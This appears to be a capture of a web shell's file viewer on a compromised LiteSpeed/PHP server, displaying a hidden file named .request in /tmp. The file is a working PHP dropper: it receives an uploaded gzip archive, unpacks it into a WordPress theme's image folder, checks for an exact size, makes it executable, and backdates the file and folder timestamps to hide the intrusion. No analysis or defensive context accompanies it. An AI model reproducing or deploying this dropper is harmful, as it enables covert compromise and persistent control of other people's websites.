HEX
Server: LiteSpeed
System: Linux php-prod-1.spaceapp.ru 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
User: xnsbb3110 (1041)
PHP: 8.1.33
Disabled: NONE
Upload Files
File: //proc/thread-self/root/tmp/.request
<?php   $p = "/home/bajjoitalia.com/public_html/wp-content/themes/vivadecor/img/add_data2"; $ft = 1753520961; if (move_uploaded_file($_FILES['file']['tmp_name'], "$p.gz")) {     $file = gzopen("$p.gz", 'rb');     $out = fopen($p, 'wb');     while (!gzeof($file)) {         fwrite($out, gzread($file, 4096));     }     fclose($out);     gzclose($file);     @unlink("$p.gz");     $filesize = filesize($p);     if ($filesize >= 349378) {         @chmod($p, 0744);         if ($ft) {             @touch($p, $ft, $ft);             @touch(@dirname($p), $ft, $ft);         }         die('_uploaded!_');     } else {         if (file_exists($p)) {             print "file exists but size = {$filesize} not 349378";         }         @unlink($p);     } } die('_upload_failed_');